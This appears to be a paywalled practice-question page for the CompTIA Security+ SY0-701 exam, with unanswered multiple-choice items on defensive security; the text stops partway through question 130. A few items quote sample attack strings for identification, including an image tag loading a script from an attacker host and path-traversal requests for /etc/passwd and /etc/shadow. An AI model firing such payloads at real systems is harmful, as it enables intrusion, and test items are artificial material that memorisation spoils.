Summer Sale - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dm70dm

SY0-701 CompTIA Security+ Exam 2026 Questions and Answers

Questions 4

Which of the following security controls are a company implementing by deploying HIPS? (Select two).

Options:

A.

Directive

B.

Preventive

C.

Physical

D.

Corrective

E.

Compensating

F.

Detective

Buy Now
Questions 5

A security analyst determines that a security breach will have a financial impact of $15,000 and is expected to occur twice within a three-year period. Which of the following is the ALE for this risk?

Options:

A.

$7,500

B.

$10,000

C.

$15,000

D.

$30,000

Buy Now

SY0-701 Report Card

Questions 6

A recent black-box penetration test of http://example.com discovered that external

website vulnerabilities exist, such as directory traversals, cross-site scripting, cross-site forgery, and insecure protocols.

You are tasked with reducing the attack space and enabling secure protocols.

INSTRUCTIONS

Part 1

Use the drop-down menus to select the appropriate technologies for each location to implement a secure and resilient web architecture. Not all technologies will be used, and technologies may be used multiple times.

Part 2

Use the drop-down menus to select the appropriate command snippets from the drop-down menus. Each command section must be filled.

SY0-701 Question 6

SY0-701 Question 6

SY0-701 Question 6

SY0-701 Question 6

Options:

Buy Now
Questions 7

A penetration test has demonstrated that domain administrator accounts were vulnerable to pass-the-hash attacks. Which of the following would have been the best strategy to prevent the threat actor from using domain administrator accounts?

Options:

A.

Audit each domain administrator account weekly for password compliance.

B.

Implement a privileged access management solution.

C.

Create IDS policies to monitor domain controller access.

D.

Use Group Policy to enforce password expiration.

Buy Now
Questions 8

Which of the following is a security benefit of an effective IT asset tracking system?

Options:

A.

Helping identify unauthorized or unmanaged devices connected to the network

B.

Preventing prohibited data exfiltration from endpoints on the network

C.

Assisting with automated root cause analysis for all security incidents on the network

D.

Ensuring proper data backup and recovery procedures are in place

Buy Now
Questions 9

Which of the following is the best way to improve the confidentiality of remote connections to an enterprise ' s infrastructure?

Options:

A.

Firewalls

B.

Virtual private networks

C.

Extensive logging

D.

Intrusion detection systems

Buy Now
Questions 10

A legacy device is being decommissioned and is no longer receiving updates or patches. Which of the following describes this scenario?

Options:

A.

End of business

B.

End of testing

C.

End of support

D.

End of life

Buy Now
Questions 11

Which of the following is a reason an organization should use different CSPs for a critical financial application?

Options:

A.

Application overhead can be better load balanced across multiple providers.

B.

Platform diversity reduces the likelihood of losing access to resources.

C.

Parallel processing allows continued operations while deploying time-critical security updates.

D.

Selection of a hot site minimizes downtime and helps the organization meet its RTO.

Buy Now
Questions 12

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk of the exploit. Which of the following types of controls is the analyst implementing?

Options:

A.

Compensating

B.

Detective

C.

Operational

D.

Physical

Buy Now
Questions 13

Which of the following is a technical security control?

Options:

A.

Security guard

B.

Policy

C.

Fence

D.

Firewall

Buy Now
Questions 14

An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?

Options:

A.

Unskilled attacker

B.

Hacktivist

C.

Shadow IT

D.

Supply chain

Buy Now
Questions 15

Which of the following is best prevented by adding input validation to an AI chatbot?

Options:

A.

Model manipulation

B.

Bias

C.

Prompt injection

D.

Hallucinations

Buy Now
Questions 16

A Chief Information Security Officer wants to monitor the company ' s servers for SQLi attacks and allow for comprehensive investigations if an attack occurs. The company uses SSL decryption to allow traffic monitoring. Which of the following strategies would best accomplish this goal?

Options:

A.

Logging all NetFlow traffic into a SIEM

B.

Deploying network traffic sensors on the same subnet as the servers

C.

Logging endpoint and OS-specific security logs

D.

Enabling full packet capture for traffic entering and exiting the servers

Buy Now
Questions 17

Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?

Options:

A.

SIEM

B.

DLP

C.

IDS

D.

SNMP

Buy Now
Questions 18

Which of the following vulnerabilities will lead to a successful attack that injects < IMG src= ' http://attackersite.net/mycode.sh ' > into a web application?

Options:

A.

Directory traversal

B.

Buffer overflow

C.

SQLi

D.

XSS

Buy Now
Questions 19

Which of the following steps in the risk management process involves establishing the scope and potential risks involved with a project?

Options:

A.

Risk mitigation

B.

Risk identification

C.

Risk treatment

D.

Risk monitoring and review

Buy Now
Questions 20

A remote employee navigates to a shopping website on their company-owned computer. The employee clicks a link that contains a malicious file. Which of the following would prevent this file from downloading?

Options:

A.

DLP

B.

FIM

C.

NAC

D.

EDR

Buy Now
Questions 21

The Cyber Incident Response Team is reviewing an incident that involved a human resources recruiter exfiltrating sensitive company data. The team found that the recruiter was able to use HTTP over port 53 to upload documents to a web server. Which of the following security infrastructure devices could have identified and blocked this activity?

Options:

A.

WAF utilizing SSL decryption

B.

NGFW utilizing application inspection

C.

UTM utilizing a threat feed

D.

SD-WAN utilizing IPsec

Buy Now
Questions 22

Malware spread across a company ' s network after an employee visited a compromised industry blog. Which of the following best describes this type of attack?

Options:

A.

Impersonation

B.

Disinformation

C.

Watering-hole

D.

Smishing

Buy Now
Questions 23

Which of the following should a systems administrator use to ensure an easy deployment of resources within the cloud provider?

Options:

A.

Software as a service

B.

Infrastructure as code

C.

Internet of Things

D.

Software-defined networking

Buy Now
Questions 24

Which of the following can automate vulnerability management?

Options:

A.

CVE

B.

SCAP

C.

OSINT

D.

CVSS

Buy Now
Questions 25

An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?

Options:

A.

Microservices

B.

Virtualization

C.

Real-time operating system

D.

Containers

Buy Now
Questions 26

Which of the following is a possible consequence of a VM escape?

Options:

A.

Malicious instructions can be inserted into memory and give the attacker elevated permissions.

B.

An attacker can access the hypervisor and compromise other VMs.

C.

Unencrypted data can be read by a user in a separate environment.

D.

Users can install software that is not on the manufacturer ' s approved list.

Buy Now
Questions 27

At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissance is the tester performing?

Options:

A.

Active

B.

Passive

C.

Offensive

D.

Defensive

Buy Now
Questions 28

A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifies the type of vulnerability that was likely discovered during the test?

Options:

A.

XSS

B.

Command injection

C.

Buffer overflow

D.

SQLi

Buy Now
Questions 29

After completing an annual external penetration test, a company receives the following guidance:

Decommission two unused web servers currently exposed to the internet.

Close 18 open and unused ports found on their existing production web servers.

Remove company email addresses and contact info from public domain registration records.

Which of the following does this represent?

Options:

A.

Attack surface reduction

B.

Vulnerability assessment

C.

Tabletop exercise

D.

Business impact analysis

Buy Now
Questions 30

A systems administrator wants to prevent users from being able to access data based on their responsibilities. The administrator also wants to apply the required access structure via a simplified format. Which of the following should the administrator apply to the site recovery resource group?

Options:

A.

RBAC

B.

ACL

C.

SAML

D.

GPO

Buy Now
Questions 31

After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps should the security manager take first to increase security awareness?

Options:

A.

Evaluate tools that identify risky behavior and distribute reports on the findings.

B.

Send quarterly newsletters that explain the importance of password management.

C.

Develop phishing campaigns and notify the management team of any successes.

D.

Update policies and handbooks to ensure all employees are informed of the new procedures.

Buy Now
Questions 32

A systems administrator receives a text message from an unknown number claiming to be the Chief Executive Officer of the company. The message states an emergency situation requires a password reset. Which of the following threat vectors is being used?

Options:

A.

Typosquatting

B.

Smishing

C.

Pretexting

D.

Impersonation

Buy Now
Questions 33

A security administrator observed the following in a web server log while investigating an incident:

SY0-701 Question 33

Which of the following attacks did the security administrator most likely see?

Options:

A.

Privilege escalation

B.

Credential replay

C.

Brute force

D.

Directory traversal

Buy Now
Questions 34

A security analyst wants to better understand the behavior of users and devices in order to gain visibility into potential malicious activities. The analyst needs a control to detect when actions deviate from a common baseline Which of the following should the analyst use?

Options:

A.

Intrusion prevention system

B.

Sandbox

C.

Endpoint detection and response

D.

Antivirus

Buy Now
Questions 35

Which of the following best explains the benefit of using asymmetric encryption?

Options:

A.

It provides mutual authentication by using identical keys for both encryption and decryption.

B.

It uses a shared secret key to reduce the number of keys needed.

C.

It allows faster encryption and decryption than symmetric methods.

D.

It enables secure data exchanges without requiring both parties to share a private key.

Buy Now
Questions 36

Which of the following threat actors would most likely target an organization by using a logic bomb within an internally-developed application?

Options:

A.

Nation-state

B.

Trusted insider

C.

Organized crime group

D.

Hacktivist

Buy Now
Questions 37

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?

Options:

A.

If the wildcard certificate is configured

B.

If the certificate signing request is valid

C.

If the root certificate is installed

D.

If the public key is configured

Buy Now
Questions 38

Which of the following can be used to mitigate attacks from high-risk regions?

Options:

A.

Obfuscation

B.

Data sovereignty

C.

IP geolocation

D.

Encryption

Buy Now
Questions 39

A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track any changes. Which of the following should the administrator set up to achieve this goal?

Options:

A.

SPF

B.

GPO

C.

NAC

D.

FIM

Buy Now
Questions 40

A security analyst reviews web server logs and sees the following entries:

16.22.48.102 -- 26/April/2023 22:00:04.33 GET " http://www.databaseInfo.com/index.html/* " 200

16.22.48.102 -- 26/April/2023 22:00:07.23 GET " http://www.databaseInfo.com/index.html/../ " 404

16.22.48.102 -- 26/April/2023 22:01:16.03 GET " http://www.databaseInfo.com/index.html/../images " 404

16.22.48.102 -- 26/April/2023 22:03:10.25 GET " http://www.databaseInfo.com/index.html/../passwords " 404

16.22.48.102 -- 26/April/2023 22:05:11.22 GET " http://www.databaseInfo.com/index.html/../storedSQLqueries " 404

Which of the following attacks is most likely being attempted?

Options:

A.

Denial of service

B.

Password spraying

C.

SQL injection

D.

Directory traversal

Buy Now
Questions 41

An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following techniques is the attacker using?

Options:

A.

Smishing

B.

Disinformation

C.

Impersonating

D.

Whaling

Buy Now
Questions 42

An administrator discovers a cross-site scripting vulnerability on a company website. Which of the following will most likely remediate the issue?

Options:

A.

Input validation

B.

NGFW

C.

Vulnerability scan

D.

WAF

Buy Now
Questions 43

A company suffered a critical incident where 30GB of data was exfiltrated from the corporate network. Which of the following actions is the most efficient way to identify where the system data was exfiltrated from and where it was sent?

Options:

A.

Analyze firewall and network logs for large amounts of outbound traffic to external IP addresses or domains.

B.

Analyze IPS and IDS logs to find the IP addresses used by the attacker for reconnaissance scans.

C.

Analyze endpoint and application logs to see whether file-sharing programs were running.

D.

Analyze external vulnerability scans to identify exploitable systems.

Buy Now
Questions 44

Which of the following is a type of vulnerability that involves inserting scripts into web-based applications in order to take control of the client ' s web browser?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Zero-day exploit

D.

On-path attack

Buy Now
Questions 45

A security analyst receives an alert from a web server that contains the following logs:

GET /image?filename=../../../etc/passwd

Host: AcmeInc.web.net

useragent: python-request/2.27.1

GET /image?filename=../../../etc/shadow

Host: AcmeInc.web.net

useragent: python-request/2.27.1

Which of the following attacks is being attempted?

Options:

A.

File injection

B.

Privilege escalation

C.

Directory traversal

D.

Cookie forgery

Buy Now
Questions 46

Which of the following best describes the importance of implementing filesystem journaling?

Options:

A.

Replication to a secondary form of media reduces the risk of failure when the secondary media is remote.

B.

The recovery time always exceeds the RTO and RPO requirements during system downtime.

C.

A point-in-time backup provides faster data recovery if data on a disk is corrupted.

D.

A log of changes can enable recovery to a desired state after a failure.

Buy Now
Questions 47

A security practitioner completes a vulnerability assessment on a company’s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

Options:

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

Buy Now
Questions 48

An external vendor recently visited a company ' s headquarters tor a presentation. Following the visit a member of the hosting team found a file that the external vendor left behind on a server. The file contained detailed architecture information and code snippets. Which of the following data types best describes this file?

Options:

A.

Government

B.

Public

C.

Proprietary

D.

Critical

Buy Now
Questions 49

A company plans to secure its systems by:

Preventing users from sending sensitive data over corporate email

Restricting access to potentially harmful websites

Which of the following features should the company set up? (Select two).

Options:

A.

DLP software

B.

DNS filtering

C.

File integrity monitoring

D.

Stateful firewall

E.

Guardralls

F.

Antivirus signatures

Buy Now
Questions 50

A security analyst reviews domain activity logs and notices the following:

SY0-701 Question 50

Which of the following is the best explanation for what the security analyst has discovered?

Options:

A.

The user jsmith ' s account has been locked out.

B.

A keylogger is installed on [smith ' s workstation

C.

An attacker is attempting to brute force ismith ' s account.

D.

Ransomware has been deployed in the domain.

Buy Now
Questions 51

The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

SY0-701 Question 51

Which of the following most likely describes attack that took place?

Options:

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Buy Now
Questions 52

An employee from the accounting department logs in to the website used for processing the company ' s payments. After logging in, a new desktop application automatically downloads on the employee ' s computer and causes the computer to restart. Which of the following attacks has occurred?

Options:

A.

XSS

B.

Watering hole

C.

Typosquatting

D.

Buffer overflow

Buy Now
Questions 53

Which of the following is the first step to take when creating an anomaly detection process?

Options:

A.

Selecting events

B.

Building a baseline

C.

Selecting logging options

D.

Creating an event log

Buy Now
Questions 54

An organization plans to increase security controls for devices that connect to its internal network. The additional security control must perform port-based authentication as part of the connection process. Which of the following should the organization implement?

Options:

A.

EDR

B.

SASE

C.

802.1X

D.

WPA3

Buy Now
Questions 55

After multiple phishing simul-ations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming quarter. Which of the following security awareness execution techniques does this represent?

Options:

A.

Computer-based training

B.

Insider threat awareness

C.

SOAR playbook

D.

Gamification

Buy Now
Questions 56

Which of the following examples would be best mitigated by input sanitization?

Options:

A.

< script > alert ( " Warning! " ) ,- < /script >

B.

nmap - 10.11.1.130

C.

Email message: " Click this link to get your free gift card. "

D.

Browser message: " Your connection is not private. "

Buy Now
Questions 57

Which of the following are the best methods for hardening end user devices? (Select two)

Options:

A.

Full disk encryption

B.

Group-level permissions

C.

Account lockout

D.

Endpoint protection

E.

Proxy server

F.

Segmentation

Buy Now
Questions 58

An IT manager is putting together a documented plan describing how the organization will keep operating in the event of a global incident. Which of the following plans is the IT manager creating?

Options:

A.

Business continuity

B.

Physical security

C.

Change management

D.

Disaster recovery

Buy Now
Questions 59

A malicious update was distributed to a common software platform and disabled services at many organizations. Which of the following best describes this type of vulnerability?

Options:

A.

DDoS attack

B.

Rogue employee

C.

Insider threat

D.

Supply chain

Buy Now
Questions 60

A security analyst investigates an incident in which a PowerShell script was identified as a potential IoC. Which of the following will best help the analyst identify an attempt to compromise the system?

Options:

A.

SNMP logs

B.

Firewall logs

C.

EDR logs

D.

IPS logs

Buy Now
Questions 61

A Chief Information Security Officer would like to conduct frequent, detailed reviews of systems and procedures to track compliance objectives. Which of the following is the best method to achieve this objective?

Options:

A.

Third-party attestation

B.

Penetration testing

C.

Internal auditing

D.

Vulnerability scans

Buy Now
Questions 62

Which of the following best describes a common use of OSINT?

Options:

A.

Monitoring internal systems and network traffic to detect abnormal behavior

B.

Installing and configuring security patches to fix known vulnerabilities

C.

Collecting information from public platforms to find possible security exposures

D.

Encrypting sensitive company data and storing it securely in the cloud

Buy Now
Questions 63

A systems administrator just purchased multiple network devices. Which of the following should the systems administrator perform to prevent attackers from accessing the devices by using publicly available information?

Options:

A.

Install endpoint protection

B.

Disable ports/protocols

C.

Change default passwords

D.

Remove unnecessary software

Buy Now
Questions 64

A security analyst scans a company ' s public network and discovers a host is running a remote desktop that can be used to access the production network. Which of the following changes should the security analyst recommend?

Options:

A.

Changing the remote desktop port to a non-standard number

B.

Setting up a VPN and placing the jump server inside the firewall

C.

Using a proxy for web connections from the remote desktop server

D.

Connecting the remote server to the domain and increasing the password length

Buy Now
Questions 65

A security analyst estimates that a small security incident will cost $10,000 and will occur twice per year. The analyst recommends a budget of $20,000 for next year. Which of the following does the $10,000 represent?

Options:

A.

ARO

B.

SLE

C.

ALE

D.

RPO

Buy Now
Questions 66

An administrator is Investigating an incident and discovers several users’ computers were Infected with malware after viewing files mat were shared with them. The administrator discovers no degraded performance in the infected machines and an examination of the log files does not show excessive failed logins. Which of the following attacks Is most likely the cause of the malware?

Options:

A.

Malicious flash drive

B.

Remote access Trojan

C.

Brute-forced password

D.

Cryptojacking

Buy Now
Questions 67

A company ' s online shopping website became unusable shortly after midnight on January 30, 2023. When a security analyst reviewed the database server, the analyst noticed the following code used for backing up data:

Which of the following should the analyst do next?

Options:

A.

Check for recently terminated DBAs.

B.

Review WAF logs for evidence of command injection.

C.

Scan the database server for malware.

D.

Search the web server for ransomware notes.

Buy Now
Questions 68

After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?

Options:

A.

Non-compliance

B.

Contract violations

C.

Government sanctions

D.

Rules of engagement

Buy Now
Questions 69

A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if there is an SSO failure?

Options:

A.

RAS

B.

EAP

C.

SAML

D.

PAM

Buy Now
Questions 70

Which of the following metrics impacts the backup schedule as part of the BIA?

Options:

A.

RTO

B.

RPO

C.

MTTR

D.

MTBF

Buy Now
Questions 71

Which of the following are the best security controls for controlling on-premises access? (Select two.)

Options:

A.

Swipe card

B.

Picture ID

C.

Phone authentication application

D.

Biometric scanner

E.

Camera

F.

Memorable

Buy Now
Questions 72

Prior to implementing a design change, the change must go through multiple steps to ensure that it does not cause any security issues. Which of the following is most likely to be one of those steps?

Options:

A.

Management review

B.

Load testing

C.

Maintenance notifications

D.

Procedure updates

Buy Now
Questions 73

Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?

Options:

A.

Firewall

B.

IDS

C.

Honeypot

D.

Layer 3 switch

Buy Now
Questions 74

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of users. Which of the following would be a good use case for this task?creating a script

Options:

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Buy Now
Questions 75

Employees are missing features on company-provided tablets, affecting productivity. Management demands resolution in 48 hours. Which is the best solution?

Options:

A.

EDR

B.

COPE

C.

MDM

D.

FDE

Buy Now
Questions 76

Various stakeholders are meeting to discuss their hypothetical roles and responsibilities in a specific situation, such as a security incident or major disaster. Which of the following best describes this meeting?

Options:

A.

Penetration test

B.

Continuity of operations planning

C.

Tabletop exercise

D.

Simulation

Buy Now
Questions 77

A company recently decided to allow employees to work remotely. The company wants to protect us data without using a VPN. Which of the following technologies should the company Implement?

Options:

A.

Secure web gateway

B.

Virtual private cloud end point

C.

Deep packet Inspection

D.

Next-gene ration firewall

Buy Now
Questions 78

A company is implementing a policy to allow employees to use their personal equipment for work. However, the company wants to ensure that only company-approved applications can be installed. Which of the following addresses this concern?

Options:

A.

MDM

B.

Containerization

C.

DLP

D.

FIM

Buy Now
Questions 79

A company ' s website is www. Company. com Attackers purchased the domain wwww. company.com Which of the following types of attacks describes this example?

Options:

A.

Typosquatting

B.

Brand Impersonation

C.

On-path

D.

Watering-hole

Buy Now
Questions 80

An organization has been experiencing issues with deleted network share data and improperly assigned permissions. Which of the following would best help track and remediate these issues?

Options:

A.

DLP

B.

EDR

C.

FIM

D.

ACL

Buy Now
Questions 81

Which of the following security control types does an acceptable use policy best represent?

Options:

A.

Detective

B.

Compensating

C.

Corrective

D.

Preventive

Buy Now
Questions 82

An organization implemented cloud-managed IP cameras to monitor building entry points and sensitive areas. The service provider enables direct TCP/IP connection to stream live video footage from each camera. The organization wants to ensure this stream is encrypted and authenticated. Which of the following protocols should be implemented to best meet this objective?

Options:

A.

SSH

B.

SRTP

C.

S/MIME

D.

PPTP

Buy Now
Questions 83

Which of the following must be considered when designing a high-availability network? (Choose two).

Options:

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

Buy Now
Questions 84

Which of the following exercises should an organization use to improve its incident response process?

Options:

A.

Tabletop

B.

Replication

C.

Failover

D.

Recovery

Buy Now
Questions 85

Which of the following best explains how tokenization helps protect sensitive data?

Options:

A.

It permanently deletes sensitive information from production systems.

B.

It replaces the original data with reference values that do not hold exploitable meaning.

C.

It stores sensitive data across multiple cloud environments to prevent data loss.

D.

It conceals data by converting it into unreadable ciphertext using symmetric encryption.

Buy Now
Questions 86

The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be best to help to reduce the false positives?

Options:

A.

Performing more phishing simulation campaigns

B.

Improving security awareness training

C.

Hiring more help desk staff

D.

Implementing an incident reporting web page

Buy Now
Questions 87

An organization is implementing a COPE mobile device management policy. Which of the following should the organization include in the COPE policy? (Select two).

Options:

A.

Remote wiping of the device

B.

Data encryption

C.

Requiring passwords with eight characters

D.

Data usage caps

E.

Employee data ownership

F.

Personal application store access

Buy Now
Questions 88

Which of the following describes a vulnerability where a website under heavy load performs an unauthorized write operation seconds after the user authenticates?

Options:

A.

CSRF

B.

TOU

C.

SQLi

D.

XSS

Buy Now
Questions 89

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 90

Which of the following architectures is most suitable to provide redundancy for critical business processes?

Options:

A.

Network-enabled

B.

Server-side

C.

Cloud-native

D.

Multitenant

Buy Now
Questions 91

The Chief Information Security Officer (CISO) of a medium-sized business plans to modernize the existing security infrastructure and address issues with legacy software and assets. Which of the following should the CISO use to determine the scope of the legacy infrastructure and develop a risk-based approach to modernization?

Options:

A.

Angry IP Scanner

B.

OWASP Web Security Testing Guide

C.

CIS benchmarks

D.

Metasploit Framework

Buy Now
Questions 92

A security analyst needs to improve the company’s authentication policy following a password audit. Which of the following should be included in the policy? (Select two).

Options:

A.

Length

B.

Complexity

C.

Least privilege

D.

Something you have

E.

Security keys

F.

Biometrics

Buy Now
Questions 93

The Chief Information Officer (CIO) asked a vendor to provide documentation detailing the specific objectives within the compliance framework that the vendor ' s services meet. The vendor provided a report and a signed letter stating that the services meet 17 of the 21 objectives. Which of the following did the vendor provide to the CIO?

Options:

A.

Penetration test results

B.

Self-assessment findings

C.

Attestation of compliance

D.

Third-party audit report

Buy Now
Questions 94

Which of the following is best used to detect fraud by assigning employees to different roles?

Options:

A.

Least privilege

B.

Mandatory vacation

C.

Separation of duties

D.

Job rotation

Buy Now
Questions 95

Which of the following data states applies to data that is being actively processed by a database server?

Options:

A.

In use

B.

At rest

C.

In transit

D.

Being hashed

Buy Now
Questions 96

A systems administrator set up a perimeter firewall but continues to notice suspicious connections between internal endpoints. Which of the following should be set up in order to mitigate the threat posed by the suspicious activity?

Options:

A.

Host-based firewall

B.

Web application firewall

C.

Access control list

D.

Application allow list

Buy Now
Questions 97

Which of the following practices would be best to prevent an insider from introducing malicious code into a company ' s development process?

Options:

A.

Code scanning for vulnerabilities

B.

Open-source component usage

C.

Quality assurance testing

D.

Peer review and approval

Buy Now
Questions 98

Which of the following is the most important element when defining effective security governance?

Options:

A.

Discovering and documenting external considerations

B.

Developing procedures for employee onboarding and offboarding

C.

Assigning roles and responsibilities for owners, controllers, and custodians

D.

Defining and monitoring change management procedures

Buy Now
Questions 99

A user downloads a patch from an unknown repository… FIM alerts indicate OS file hashes have changed. Which attack most likely occurred?

Options:

A.

Logic bomb

B.

Keylogger

C.

Ransomware

D.

Rootkit

Buy Now
Questions 100

A Chief Information Officer wants to ensure that network devices cannot connect to the public internet and the local network to directly perform firmware updates. The IT team must manually perform the update process by using a portable device. Which of the following architecture types best fits this description?

Options:

A.

Microservices

B.

Air-gapped

C.

Software-defined networking

D.

Serverless

Buy Now
Questions 101

An administrator finds that all user workstations and servers are displaying a message that is associated with files containing an extension of .ryk. Which of the following types of infections is present on the systems?

Options:

A.

Virus

B.

Trojan

C.

Spyware

D.

Ransomware

Buy Now
Questions 102

A security analyst is reviewing the security of a SaaS application that the company intends to purchase. Which of the following documentations should the security analyst request from the SaaS application vendor?

Options:

A.

Service-level agreement

B.

Third-party audit

C.

Statement of work

D.

Data privacy agreement

Buy Now
Questions 103

Which of the following tools is best for logging and monitoring in a cloud environment?

Options:

A.

IPS

B.

FIM

C.

NAC

D.

SIEM

Buy Now
Questions 104

Which of the following attacks primarily targets insecure networks?

Options:

A.

Evil twin

B.

Impersonation

C.

Watering hole

D.

Pretexting

Buy Now
Questions 105

A recent penetration test identified that an attacker could flood the MAC address table of network switches. Which of the following would best mitigate this type of attack?

Options:

A.

Load balancer

B.

Port security

C.

IPS

D.

NGFW

Buy Now
Questions 106

Which of the following would most likely prevent exploitation of an end-of-life, business-critical system?

Options:

A.

Monitoring

B.

Isolation

C.

Decommissioning

D.

Encryption

Buy Now
Questions 107

Which of the following is the best way to prevent an unauthorized user from plugging a laptop into an employee ' s phone network port and then using tools to scan for database servers?

Options:

A.

MAC filtering

B.

Segmentation

C.

Certification

D.

Isolation

Buy Now
Questions 108

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?

Options:

A.

Default credentials

B.

Non-segmented network

C.

Supply chain vendor

D.

Vulnerable software

Buy Now
Questions 109

A systems administrator discovers a system that is no longer receiving support from the vendor. However, this system and its environment are critical to running the business, cannot be modified, and must stay online. Which of the following risk treatments is the most appropriate in this situation?

Options:

A.

Refect

B.

Accept

C.

Transfer

D.

Avoid

Buy Now
Questions 110

While conducting a business continuity tabletop exercise, the security team becomes concerned by potential impacts if a generator fails during failover. Which of the following is the team most likely to consider in regard to risk management activities?

Options:

A.

RPO

B.

ARO

C.

BIA

D.

MTTR

Buy Now
Questions 111

A security analyst wants to automate a task that shares data between systems. Which of the following is the best option for the analyst to use?

Options:

A.

SOAR

B.

API

C.

SFTP

D.

RDP

Buy Now
Questions 112

Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company?

Options:

A.

Provisioning resources

B.

Disabling access

C.

Reviewing change approvals

D.

Escalating permission requests

Buy Now
Questions 113

Which of the following incident response activities ensures evidence is properly handied?

Options:

A.

E-discovery

B.

Chain of custody

C.

Legal hold

D.

Preservation

Buy Now
Questions 114

A manufacturing organization receives the results from a penetration test. According to the results, legacy devices that are critical to continued business function display vulnerabilities. The devices have minimal vendor support and should be segmented and monitored closely. Which of the following devices were most likely identified?

Options:

A.

Workstations

B.

Embedded systems

C.

Core router

D.

DNS server

Buy Now
Questions 115

Which of the following solutions would most likely be used in the financial industry to mask sensitive data?

Options:

A.

Tokenization

B.

Hashing

C.

Salting

D.

Steganography

Buy Now
Questions 116

An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?

Options:

A.

Secured zones

B.

Subject role

C.

Adaptive identity

D.

Threat scope reduction

Buy Now
Questions 117

Which of the following is the best way to remove personal data from a social media account that is no longer being used?

Options:

A.

Exercise the right to be forgotten

B.

Uninstall the social media application

C.

Perform a factory reset

D.

Terminate the social media account

Buy Now
Questions 118

An accounting clerk sent money to an attacker ' s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following would most likely prevent this activity in the future?

Options:

A.

Standardizing security incident reporting

B.

Executing regular phishing campaigns

C.

Implementing insider threat detection measures

D.

Updating processes for sending wire transfers

Buy Now
Questions 119

Which of the following is the best way to provide secure remote access for employees while minimizing the exposure of a company ' s internal network?

Options:

A.

VPN

B.

LDAP

C.

FTP

D.

RADIUS

Buy Now
Questions 120

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

Options:

A.

To track the status of patching installations

B.

To find shadow IT cloud deployments

C.

To continuously the monitor hardware inventory

D.

To hunt for active attackers in the network

Buy Now
Questions 121

A security engineer at a large company needs to enhance IAM to ensure that employees can only access corporate systems during their shifts. Which of the following access controls should the security engineer implement?

Options:

A.

Role-based

B.

Time-of-day restrictions

C.

Least privilege

D.

Biometric authentication

Buy Now
Questions 122

Which of the following should be used to ensure a device is inaccessible to a network-connected resource?

Options:

A.

Disablement of unused services

B.

Web application firewall

C.

Host isolation

D.

Network-based IDS

Buy Now
Questions 123

An organization is building a new backup data center with cost-benefit as the primary requirement and RTO and RPO values around two days. Which of the following types of sites is the best for this scenario?

Options:

A.

Real-time recovery

B.

Hot

C.

Cold

D.

Warm

Buy Now
Questions 124

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC’s memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

Options:

A.

Privilege escalation

B.

Buffer overflow

C.

SQL injection

D.

Pass-the-hash

Buy Now
Questions 125

Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?

Options:

A.

IaC

B.

IaaS

C.

IoC

D.

IoT

Buy Now
Questions 126

A company is expanding its threat surface program and allowing individuals to security test the company’s internet-facing application. The company will compensate researchers based on the vulnerabilities discovered. Which of the following best describes the program the company is setting up?

Options:

A.

Open-source intelligence

B.

Bug bounty

C.

Red team

D.

Penetration testing

Buy Now
Questions 127

During a penetration test in a hypervisor, the security engineer is able to inject a malicious payload and access the host filesystem. Which of the following best describes this vulnerability?

Options:

A.

VM escape

B.

Cross-site scripting

C.

Malicious update

D.

SQL injection

Buy Now
Questions 128

A company ' s end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show only a small number of DNS queries sent to this server. Which of the following best describes what the security analyst is seeing?

Options:

A.

Concurrent session usage

B.

Secure DNS cryptographic downgrade

C.

On-path resource consumption

D.

Reflected denial of service

Buy Now
Questions 129

An administrator has configured a quarantine subnet for all guest devices that connect to the network. Which of the following would be best for the security team to configure on the MDM before allowing access to corporate resources?

Options:

A.

Device fingerprinting

B.

Compliance attestation

C.

NAC

D.

802.1X

Buy Now
Questions 130

A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. Which of the following will most likely help the security awareness team address this potential threat?

Options:

A.

Immediately disable the accounts of staff who are likely to be terminated.

B.

Train supervisors to identify and manage disgruntled employees.

C.

